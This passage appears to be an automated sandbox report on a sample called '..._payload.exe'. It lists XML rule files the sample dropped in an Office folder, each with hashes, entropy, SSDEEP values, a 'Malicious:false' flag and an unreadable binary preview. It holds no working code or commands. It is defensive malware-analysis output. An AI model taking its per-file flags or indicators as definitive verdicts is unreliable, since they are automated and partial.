                                                                                                      MD5:7B681C2AB86EC8E3B95CA50E9CBA42BE
                                                                                                      SHA1:969817A36FF86B70D131458EF736CB25FBFFE48C
                                                                                                      SHA-256:AF747598EAD1043D5038A395C92307ACAC3DFD239F683152707FAC9A4A3111D4
                                                                                                      SHA-512:5C4C3F84FE44394AFE025CA1014D25D3CF7CFF542C9384A4F040FD4651888D570CB57F5EE3FA8902B767B00E8760CC438155BF051BBCB51049E696696F494818
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.>.}x.. d..w......?.'..o./Ma^f.....d...l.8 ^..4A.v.L_...j.~s.<..{G.....}...}"..b.x.1....H.....ICV.B..._..O..%.6I..|qPV._.B.Q.mt..A.#m.....O...I....N.@.T......?XS=&.En._S[.. ..I]X......z5*..v..I<.8._.0.....T...1...@U4d.Q.n.[....)..."..........,.%..zN...O........4.+...d.......,U...G...8!w.p.e.....CeR....Ds.....y....#...ZJ.~. ..`.....b......d. 4..o0..I.`<.I....e.Q.D..b.4.Z.T.2.~.......z..3.)0.09.....yK%.A'! .;.p.E3y.g2..k......;..>..X).4..Y....rJwD.L.......WDI..ilE.....y:=.p.C..7_......Y.....Q.FV...s....\z.. .p.\....i.K....q.E.G.G..7.S..o....g..;...b{.^l...8H...r.....d.ON.X.P.-V.>k.|....,._M.v.@5.3^.t...xP?M?..]...<sq...=........(l0.. .1(..*..bg....Z..t.o.iz....y2.o...#".=z.tGc.G.z.*.+`...H..f..RW.6.&..n..f....LH...x...*..0...].g.?..!..0-TB.\.B.b.A..Y}.z.Pg.[.E{\.6...j.........g..`p2...."v..^.I..........FM.`.I.#5..}.......N....%...Y....].._.9j0..S5.;^G!f...~.U.f/..#..i2......L...DT.....|r.......7.<C+..oM..5....n._....Y^

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703200v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.874821658305865
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:KhKidmC2iuzDen0B5oB+Ri+WIQz1SWkwL4RYdSK/mwD:sKidmmn0AB8QYWkwLRD
                                                                                                      MD5:AD7247BBF8A28849219C79CBB8B84B4F
                                                                                                      SHA1:C9644FF51388F2B3EF10B260D0686C5C82642DA6
                                                                                                      SHA-256:9B323AEAFBC4457ADB37232C6E5DF5C7A6FA8331B02CE892253819EF4F5F3A03
                                                                                                      SHA-512:891219FB50DA335ED4CFF0B507FBCEEFB22FF38C1F7B424DD832BCD81A171A6375541A9A413DE35BEC51E7C8161D9CAE31DF94450B670E1C36EBB22EEA8CC8AC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlG,..GQ..U*..s....s..cNv....b..=".qah.]i;.n..9g...t.~...K.9s.....K..kz........s...K..9.=.p.).<...r..........I..............d..U.\.c...:./... *.~...........2.\J!k..b.,...oV.C.5...s..2.IG....mZ.J..c.0|h.X.Ui.J/.^..@.D..e.\....f.0.3Gvl.W.@ Yml...k5oD.id..E..J...Tt.P...t.. ...J..=S.x..S...."m..C9;..5.{..I.'.....j.....Y....;4.k.B.S..q...W..h..i..0..5...>*n..X..K.A.......r..LG.f-.9/.....v...6..e..f~....:.F.....Y...z.\.4.#..Yj.VW.1...,.0.di!.t..H.m.J........a.....+.....%I.....x1@]......y.I..#........J.w...B.1..p...~..-.S~..T..G..7]..j..E%...".&.Q.f'..?g..._....g.[.5......).....g..Z..J.W.(..K5....-.s6.._......9...{.m(...I.T.9....YOt.>..3.(...........k+i.T...e;....C...qS].\..j;9A..b../.*`....N..<...2..n$.\....^....eFu`.<.....w....L.....;$.?f.0".3.}..ad..I8..q..&C.=.|q.....~.h.1....P.c"...[..XD.;.I>R..Uw....a...5.n.{.........28........{...-.(..jj....x^g....c.Y....T...g..N......`.@Q..%.{......Nlz.....a..r. Xn...nI`../. 1.... .+.-..N.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703201v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.889210286454078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:DhRY6plCdHBy/+jotVD8b11C95po5CMbT9kwD:MASSVwb112+hbh9
                                                                                                      MD5:805CCDEDC21619945167C7E42CDCD046
                                                                                                      SHA1:6AFD1C5CC7D2A5F140261F4D41901F7AB16863B4
                                                                                                      SHA-256:4C52FA1FC666B59A6D1FCAF89E3FA10709AD1673B8A4F71EAA3141F360160FCB
                                                                                                      SHA-512:E8AE700E0EE22C32C92DF8D53CD0DB22AD600AC27091924D7C0F0A998EA320CE4B2616297DB4C6BE00CDDB4066DA6E047247339FE7E8E9D403D598217F5AF23A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.w&V..T4p.Ca....~...9l.7.h.a.qkd.z...3..~*..kn.j..l.\3.a..?Z...k....>.%._h.s.QA...A...KD.:~q..XaUwO...v<d.D..z.g..CQ.......$.).n7"<...*`~B]?.CkH...'...-.`...C.3....... -..sO.I~....W.5%.h.....i..[H...$..D.$JuY.,....6.b.....X;..1......w.5.e...=... 0M?$.......G.9_..p.._`..(,...N....r3-....z...L.yaB.u.,9.e.[$].s.......*....9...{.t....:...a..|C......|....j.y"H......ji.....wv<h.H..E...>.F.Ef.4......./.....-.V.....R.....A?........B8....rb|~.d.LY../...a?<.!..E..5...#G.H......Z.}...G...'.J)nD..~..Ug...`......9......FlzU.I.tR..........i...`...n..........x._.Of91............s....E..h"7.CEN...$..,..gN.E....j....|e..Eb.A".>....8.c..'o>..QX...%...).W.:..*y....w.....TQ...,..I.=.......9M7.iW...|.vn.....-...-y~.dw.6!.>.y.. .J..%.+..<..T/.......o.u.B..H.noZ....a.DF...B..+..7....v..mH...X.'y.5mx.P..........Ih:S.T......l.p)....)....x..{.C(..E.#]RH.h.vg.F....6}.=ss.Q.\u..Z.|....zP..k.J..Q....6j7..].y..].z...H<....e...k...*.f.x*p..F...<Sg.4.y....(.$D|/B

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703250v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1693
                                                                                                      Entropy (8bit):7.8991951803936145
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:9aHOYmQNl3bMWAfc0kx6CZoJH+DohbcXKfNnUZRWYptRgAfsVO+5XLTcHNshENJ+:YuENVbZAfcmbc6fN4tV0VRpcgENIEwD
                                                                                                      MD5:F65EDD9FB5DBCE1D6B2DE09CA2160B72
                                                                                                      SHA1:0DC658A3DED3E683456842479E06CBA5DC95A507
                                                                                                      SHA-256:BBBB5A3BF90E13CA74C3A13953AC65D2ED7ABCF99AA84AE6615D2A97732C6883
                                                                                                      SHA-512:AA93E72C57A5E358A3B391ECDFB138760744456105AF533707ACA8A68087B2A8604C96434B0F1F4EBD8C70AD950F1ED5E76B02F8474D41E7219832C64DAB3F67
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlN..=t.......9|;zM......s..jf9Dya....+}(..(.9/..#d...&..@x.%y)z....`.F..e.....+.#.{~i>0."K.Ay..V...../....}c.....@.....P(....u../#...a!.[(.\..26,.._....Q.3..}. ...|.W..i).k..ka...PAc........C...Dt....1.r..u#....}.7n.... ,..zs.;.s..vVcxL.....u..... Nz.)...u......".QW.w.O.....7..#....Q.e..i*vC.....g.=..or.Y.EwIp.q...@_..L...........S.$..%0.....l9.....R..Cr.n.r.o...5q...sp.0g7.-.....=]..V..i..^.N..:..S....i.(d.....o..)Rqb...B.....(..He\.:.V......S..G6..%..2....4.p...6...LC.....6.......-.t......`.4+.."a....(w.....[.~..../. ..).....F#.$......4..N."....n.8..a.C.r..Y....../..-.....b*.......z...Zo.......{4...'...7...Q...0)x....Z..$....y6.|......c[M..-.<2.O.f.E..K1.L.....&].{......N.y...s.U(...9............^.Z.N.W.6x...3G.Bgo0..6H.3..3...K.....q.9rW.....4.z.....T.......>*..O.....B+/........pY.]U.%....'5x...(.J4.L.N....=A?.q@...}%....D0^.=...`o8.m..........o.W........3.....L....g.r-...X............*Y..g.R........J.....x.x.[..D...%.;....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703251v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1730
                                                                                                      Entropy (8bit):7.872190451757834
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:w8EIztovnhELxPIwZJQ4BCrhP1Fw2q1EKY+xtQVEmogFO+RimIBjHTWE9b2HhPz1:w8becwt4YVq1PixOLmC3WE9uNzrLURwD
                                                                                                      MD5:EC127A440B94014650C2E9B0F523BC28
                                                                                                      SHA1:F5EA26E02BD8DD6AEBFAA298BE368FE1EDCE5EFC
                                                                                                      SHA-256:58248D19E01D58872A8B020D6C6C56C70E7DDC449A043DB7EDC9CCCA1A035495
                                                                                                      SHA-512:D0475AC7ECA6C2FA789D0389B8C0A1E3BB574F17FD19E685BD4A9915AAE7024CC6200F773B91E3CDB5C8754A2EF69772C65BF66DE5767F4F78A404A6416893C6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlM.....v.. .H...G@..z}N.:..U..\..k.....z..W.,..P....%.H`.W......T.`...>%..m............Y.].c..S.k..i0..1.Z.B...S.^d.X!....Y|d.....|.q..(.b.F..c..Dj....x..AQ.|~...U..o...E....e.%..n.ZC.'6..A..;g..ao`.......sh&...X.$7D.....i;o...{$.._`.=....O. .GE._....T=...w.`Z.m.....1R....U......d!..ZY.....P.........*=..T...0l...t..jU...-..Q.)v..R...6......&.C.._~..^.?0T....-.../.z...Pp....i.4I{F.....!......2|..n.d=.P.o..e.j.j..Rh..d.....k..qH-D.!.,#....~..s.F|..n..wG.......c}....x...B0..}.......X,..$3.....Ig..}k...|....V..k...;P.....l.jd*@r.o.J.A8bc..3../.\..n.< ..]....n..t.2a....0..R.......M__..\.4.A....]s.x.>..../.g....\Wv1)^g. bq.j...DU~._6.F.R.l."..JjaR...2Z.i..[.0.............6<../..\......t.s9]...v0.%..#........>.*..W.9.lQ.E..9.??........s..X...H.j....h..EP....M.d..9......Z.........Y......x.`P...N..R..._....z...JQ.d.I.@}.@.Qs..Z..[.....g.}Q...Z).'s0K.o... ..B7,..L.yV.'X3>..&%..{.N......0.......0.....R.4s...*!..-5.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703300v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1715
                                                                                                      Entropy (8bit):7.88856378461265
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FosdYpklHui7gfkUjo/1FQSo4Q1RLUVCMWRrQk/bwD:FozpklHwLc/bKRL8RWMk4
                                                                                                      MD5:A370507FA1C3189DAC4804661A5E1AA1
                                                                                                      SHA1:87B239AE2C721F44B0DAD813A7D62904F3E03A2C
                                                                                                      SHA-256:186F894B89A0586307BBD346B32EC0540E825450B210124ECCBDB13E262F8576
                                                                                                      SHA-512:109AA79EFEFCBDFB8189FF856663FD15F54019E5E3A1F9D808DEEBC5449DE751EC98AA6A016CECC73CDDB6CC92E6F99E104D777C62B9B0569F35357E15D2FAC4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.._...u.......t...t........f..&.*....~....}..'.u.!F.....*...zJ=.R.N..!...;Ur...yE.nj..._~Q.e...0=.{q..!...4{..W.....]g.Cm<.x..q..Q....6.Ll..YX..-(....ZQ.2T0..M.r...G[.MG...D.\Cf.2..9.......U1...1.L..*r.0H#*<..C.....Q0..V.uF8.n..E.iU.$.&...nH."O..>..e..I....8...+....In..O.L...(_...u....../.I.W.....M..W.......v#....(v8}.x"......O...,.h.1T.bk..Y...S.'C;1.Sz.o]..U...BFbv.............G..._.Mr....w........1P.|..r.<K..&.......xaz.....L.....Yoac..}....q$.-...].....j[....tY..R#m.7.mI..1").s......T.-.....8.};{)..^....1..[...V.....2]z.T...E<7.'......rk....?s..A;......A...n....Q&..Y.9.r5?V..uk}.!.No.......@s.....|.k........R."...U..}Z.....,...B.5.u..:.U^.V..I...1....\.BL.R..e...y.s...o...7d.....dC.8.N......VV ..!Z..u`}.!..W.5.......Mw.l..a".s..S.6Sd......].........7.x....A...u.j..(..9....l.0[......4.g.1F.',...q.\...._..@V.?....T..:.[..nq..'t...v!....l..8...i$........5.y...(!!.....OF.A.=..>./.;F.rP....5.2".<y.ej...[....(>...UF.)doz..M,.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703301v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1752
                                                                                                      Entropy (8bit):7.890693420756004
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Xh7Y3YGCPbnHpMM6zIl97L7prq2cV7DRrJyNnHnZeJwshScvktlvZJwD:+ojdd/97L7NAV7FJMn5Ohhhvktdk
                                                                                                      MD5:747A372EE22FA5243AB85BE9AA8A93C4
                                                                                                      SHA1:A493D377F7DE07F2C0DD5F047C4159BD89B18811
                                                                                                      SHA-256:AA2DE46F8DE24087A81732DC07EF687DE33C5795FF34C14A355F1D461E30798C
                                                                                                      SHA-512:4CEDE65601D91EC38F911DFD5E98C8C540AC6FA2DF3535A9411D479A52491A5AFC69167CC915A94812F260991E819483443DA6C54B872EE03435CC693E823665
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....;LV.{.H.....~.a4ZL.W...k.w..H...My...,...P..$.'..w.je....>..,...rn...*..fN..b..U..E.8KN.".\wa..I+......J....#........7`=r......S.....m...u..Zd..e...EG......(....4....h....5..U.{.I..fS{/.T.|..R..rK....(O{.iG.l.q1......aM....$Cu..Hwu.g^....U.|...O.@..H.`.....y..|.'yXw].....T...Tf..7w.xZ....D....It&...%...W..N....hV]x...\.m.....8.d.G4.rd.y....q6D.W...../5x7.6.R\c................z0.4......k-Y.T(.?.-..SW.{N.....F..&....q....q...|..@~.Bz.xe..+...97...Gp..s.%Z.....D.Fq..e.Eh... .B).......y..I..K.e.....9..@7yy...97..@........J.R....%....[s.U.......}..lVF.Sd......I....W..=.......U.........X.....1`......2....PkW)...9.......oM.o..Bj....#P.'..a.$...uB.:lR..'....;D'.....u....$q?..m...j....0J......An........n5.12.../D((#...L#9....;Dh.T.W.p=.d.%D.[..%pi..&..T..zn.[..y.,.t.>.&........h0^..........-c.V|..D....9....Qi'...DBj...^..l......4..]v...)...DS.Y...M.*..^...6...Dm4..:&v........~....V.&`CP..G:.~.......dm..xZ.U...`......y.....Uqz.../..5.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703350v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):7.9027388120650395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:71mNA+y7gRnDJGbxT3Y1nxsRKV2nBV5GIwD:71mNA+yaoT3YhxgG
                                                                                                      MD5:0EA825BE055D48E4D99B69949760DB6E
                                                                                                      SHA1:9FEF03719F5A6E7C9EC6645A3A7A7D128766EC44
                                                                                                      SHA-256:2DDB43660986422D2253CAC68F0FBA3B54F5A4D52690DF36D79677DFD6179F1B
                                                                                                      SHA-512:9495075A4597381633EC89A55A35A5458F3EECF7F288BE10B70B83A726676D4061A78609114C85CB6B0BF3C2B0B92A634DA6D00AD1E28485615449B555097BD6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml._.X.7.w.H..K..&A.a.....J[P.N.......p..o.T.I.<d..*.....6z`t....v."..$>0.E.$...o.%.!...`..9.....L.........,o._(...)V....-. ..)9.0.4B.&..5Tc.e...m...kX....Tb{.}D..f.-.'Xv.......v...s(R.^.lh...KF....{.-...#...R..e.b#....1.E.Wi.u.MCVF+2O..N.A..k...?....+@.\.m._..Rb...w&"8.>_...=.....bW..+B.!..P.{......\.7x.s.U !..I.5z..8.i.2..Q.`.....7..UmF..N.....W#..q.xT...7A...........K.....b...P...=..n4.b.4..|..7..5.*..Iol..u..y2..).......3.x....5...3.....V.........D....G.zI8..7..C....dg..F....m..r7V...9.O^1a....<'.n...h...&.jm.{.w.Jh[.D.....(}.n...%..a.~....0...j.k.},j..L...D*.G^b.hW.F...+...@...e.".+.F0.....0....<..>....P..D/.u=0VW..7.G.k/..Q...E..;n..*.Yx......g.$a_...^%......h..a........d..........=P.....0..nUFN\....+.......y.A.<4 mV.$..R...[eN.T....."..B.x6M....l...Q.b.S8....~;.ov...f...)N.w.WP.7v......>....n\....N[..i.F.R9.u.:.P+.....\.w.g...O{@.d;.....n...$.}$...C..3...>._O.O......F[JoD.^P........Y.. .#.H......*.)..r..F...o..i#;9.}f.=

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703351v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1736
                                                                                                      Entropy (8bit):7.878627438151814
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:28pRQbq9EXZ2RtC2MfiPVW4AIBDUJ/MuNNbIw4yDnwD:/n9y2Rk2xW4AIOJ/MuTj4X
                                                                                                      MD5:88932F4B58FF2BF6DDB294EF060DB279
                                                                                                      SHA1:AE0F62E014E96C34A637FEDD233D3959C6CF80F0
                                                                                                      SHA-256:F501A7616A208105563E28B2568EAB7153C150EB9E11E10B2FFF7662F5773503
                                                                                                      SHA-512:0CD6C6D22E98D4E3BB47FC871E355222FDBC5BDD9FDCECB5DCD70FA4E9623A306071C06F04E5C11F2BF177365BF96C24E54D92F7C66F4D3006B2175DF628BC26
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.P~.G.l.8..%NT!.l.........E..:.....Ayed.............e.....t.)e.......3..0.sg.. '...p+....v........F&..8_3............kc...X".G..-.......m.aY....&..0..K......w.K.T..Q....ID..o....P.3.us..]....e*...L.o.Y..l.V}..s......tq.8b!.[.K.G..........!...T1...j....N.o......4Q...w..&.{.M....I..Q.....Z"......Qp...t.......W.2....g&.......WX...p..S.........8 ....i..!..V....5.6/...`...\`.....e..fB.....=^.:Tb.;,a.oJ...Y.5.e..wV...&.&.z..A.-.&....x=.-.T..........2.....-H.j.Lt.8CE...h.G......t%.c.Lh....S.8/.....v.._.2...*+....2....DR"..s.h....Cu.$+C..ey1.._x.]..m.L.^.K..$.m.5}..^...6l%q(vj.^...T.".R.....\,.}.Bu[.......7L#v.+.\..pu..M..zbA=\b....^.w......,.i.=f....GTs.8..]p....&W$&...j=8.3..s.......0pN.H.^.h4.(`..P.I$....j"..-%.,...I..@..d.a.....{.7..#..D.?.l.z...p..x....,Y.....k9p..qE.....E.-...'..`...l:P.@55mp.#8.=*...._...I.....a.[....9.s.3..F&Z.`|;..W..JH..jI.GA.....(.2...........$... 0...E...`AB..TN..t.k.....nUV..Q.........t[.me.....-....n:.[

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703400v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1721
                                                                                                      Entropy (8bit):7.890846792936795
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xG6ag5P6YNwzuUKEjhlECLBH+jaXifGaTiM+8r+unwD:xG6dlNwzM8jl+eXgrTiM78
                                                                                                      MD5:5CE50A81EAB5FA7FBD05B093D4807E1F
                                                                                                      SHA1:C1542F95B5572AE0926B955A77AC3775A5BB1A77
                                                                                                      SHA-256:19BEA27729E2924070A3D4CA077D197D2816A5FB4CD985F29FFDE4D4926171AD
                                                                                                      SHA-512:2FF547DB9A21902A50A609CBB1D741FEB14E0D7EB2A0CC513A472748AC8BC39013E4E217CFD0E8CCDB92903F80EBB547A0B2F60CA3C76003E44C5FA18BB40676
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmls&W..>..w...fM.......mx.&4$....,.y..R..;Q.z.!.E.........L|I...4"..&Y0..L....I.A."....aw.5..;.Cl.?....%FW.1.Y.X..Z..a......N#....\...v]#....7..L.x.4.d.....M.]....8..O...2.,..1...T..+f......y.7.).F....K.CY........Oq.......b.....`....~.N..v.0..d`....D..)*g.?.|.N...Yn%.....\R......EZ&..#s..c.* .3|XL....v.pO2.U.#.... G=..0....Is...%.!...k.O..i,..\Y.....^Wd.m..!....CsM.*/...>8aUI..o8.Om....1..)..e%$e.w.<=y;.)..v..o.{.6.F.*d.#.....#.....kC.e^.e7.8.Y[.[I5..9.f..F8..*...\/;'|u..LA...E.T...U....Zc.lv`0..a.=....V.......Ef.........Q..k2...1...B>G*.A....H[?".r.1....Mw.>,03.$yz..P.2).E...].?V...f...r.ik..D..&`+.QW....R..-..<......;hy1...G...}.............$..\m.z..$..D.b..^.:z.fzF.j..b?6."9.J..f.BIK...{..*D?..).@....^..Iz.....!T8.&&.c.L.p.O...P.G.2..;.tS../..@....Qy^J....Sj.u@=.l.Z.R.&e....JD..g..AzM..z.Wm.......m3.,.q.......osBUg3s..9./)#i;.$...#......W.7...{f..E.n....I.%..-.E3.l....C..{..NE.fS....."T..:G.....lh9.C.......L.C.UI..Y.e...<.(..-

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703401v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1758
                                                                                                      Entropy (8bit):7.886552857544294
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:C0q0UBgET9WzqPrZqPskoF9JPYXvPu0YI9PwD:C0q08g9qTwPBoF/ACB
                                                                                                      MD5:9DC13754BDBD32070ADBD0E4DCE1F536
                                                                                                      SHA1:1060251B440BAB4844C16ECF59E83AC64D667661
                                                                                                      SHA-256:6388DEE778C762F3D2DFE27E7C0ED418EC1228266C512E060B3ADB61AD888572
                                                                                                      SHA-512:85187ED95DF1FE0C838FE5E69BFA0E6D3F53737B1C94003FD4A7B73FFEF892E890006EE99303447290688BFC34F707E74101C4E3700757CE56864466936B1601
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....a5=.../f[.......x...sC....w.d.E5vy....k.j..,E.)..=...n..2Dl.-K.y:...+8.K.6...\.?w.Y.[..`.U..o...g.....O..0G.ew....4Q.%.AY`...4..Uk:.....ezK3~..{0.....X.z.N.q....;jL....a..V.Z.yz.C.z..C....<..EJ..e......k..n.&.....`.3/d..n.._.[.x...u..E..K..E.p......7^.......%...gF.T...j.@..V....W..@y,...l..W.p.x.l...*..=.x...|U}z..N.krPf......b..1B.K.Z....W..j....D.I....2...!.....s>...Y...$.x..=..2t...i..C..r.....1.....U2`0.HQ........BO..[k.U.r.;...P.....>.b.m%%..L$+......0.....(....u..>.cv.t...w...r..l...W.y.%_..q.N..0Tc.X.Q}L.%......LbYQr..4.0....,s.....!..7..dZ.(..T..W....3..)f*k...(.w.....D.i... .....f..R.<..X....6b..D9'..L-J......$..s..6.c.G.3.B..~.ak.iT.F:.......M...hJ&.3.9...&..v...*...9-....aQR...>6p..P.3{...q..ie.+.H;.......G1...P.'...C.6...%..yL.8.T..M..*T..y.%..{..0.|e.$.y.S#sK..%Y.....a...R..!.u!.`....\...A.z.y...\.;.^...U.l..Bi.7....-....^gB.Rh.88./.q.F|.;l^......)......:.86...a..^..E..v!Q2...|Gcl..}+.....!....~.Ku)...(m..d.`...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703450v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1705
                                                                                                      Entropy (8bit):7.8813597265810476
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nfI1jAtbpv5mrn7+4inE8MxxpH4BWCk4vOUwD:fKjvr6BnE8exJVCy
                                                                                                      MD5:7EE3774760F02E1393937B16E83B29E7
                                                                                                      SHA1:26D28767348483CD9CC5CDE286ED196BBE7A249B
                                                                                                      SHA-256:5AC27F7989FDAB22BCFA6B216246B70468B4B8038A5AEF3973EBBD46C89F0EA8
                                                                                                      SHA-512:4CDA940B3C474BB718F2EFE73D3C2A6053931E4E832FF285D965C4C33B9C8DA81110C5BA07167F42C0A486997B51E6DBB4DE3F1C4F1BAD8BA4CA63B1ED1BBED1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.}.o;....R....d.....@..}XC.n.I=..t$....Z.H........0%..9..2CQ.j.l....k.y.......1.[..D^?r1._......2...8..N.D..M]..\..~..6W]Qz.....5.....>.......\.?..oJj.b.......*..:...c.3'U..).*Vk.3...{....0K....O$.v.pC.<(V...P>.o.o..;...SG_.9..z..o.]l....6.Oxg....IG.9w...O5|....g..8;......ix.e....?..L......`XE..)..V.r.....tU~..n..._.tH...Y.hq.z.P....M...,~[..r.....j.F.~..*.....Z.o.N.d....9.>U...j..U............DR.y.M{C...9.,..I-[I...?e......E....k...#.......1..G.onro.8......7WP..U...f........s...C..... }=fv..!. ..l.[gXF.GMg..8..c..:9..*....".....$.....:....r./.......St.d.8..2.@F..,.vU..1v..c..d.1-}|Uw....X.....It.(...c..P........X.|!.j..4......24B..%[......I.&..GlN..}>"i...".....]....:.TK.D7eTLA.hK......M.......vjTA-c.............@.....b8...t..3.."...R."..z..*...sUn.)...p.8._$.F....Q.....5..T..4..T@rc9..."..C<$2.l..+.......#Wd.)....X.jM..`..WM|).(~.B'...>.V.jK(.......(m...!..._..*.....;%1j........c{H41h....L....H.5.zT..=..X.r...}.wk..I......D}.'

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703451v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1742
                                                                                                      Entropy (8bit):7.897502193123621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:3fRRhCjc1bMTQR8gtqb6tD6O/rRQJmLyc1mZwD:bhQc1bMlgdWmWK
                                                                                                      MD5:3E5B4AD2166E2201E4B43DC270B881A6
                                                                                                      SHA1:56F6E3B71EBF1847DAC7F47A055379AFF4D191FE
                                                                                                      SHA-256:6A54E4D7DC9F7A8799607F745BD839C74206EFEB8564D61580C0E8F04C0E161F
                                                                                                      SHA-512:064503869599F1D467BEC2D0AB04D0272157ABEA166FAD7AA005F6F07C8162C3DDEFB226527E78351ED224DB2A1C4CC2CD69DEF473A99D699ACB4512888F601A
                                                                                                      Malicious:false
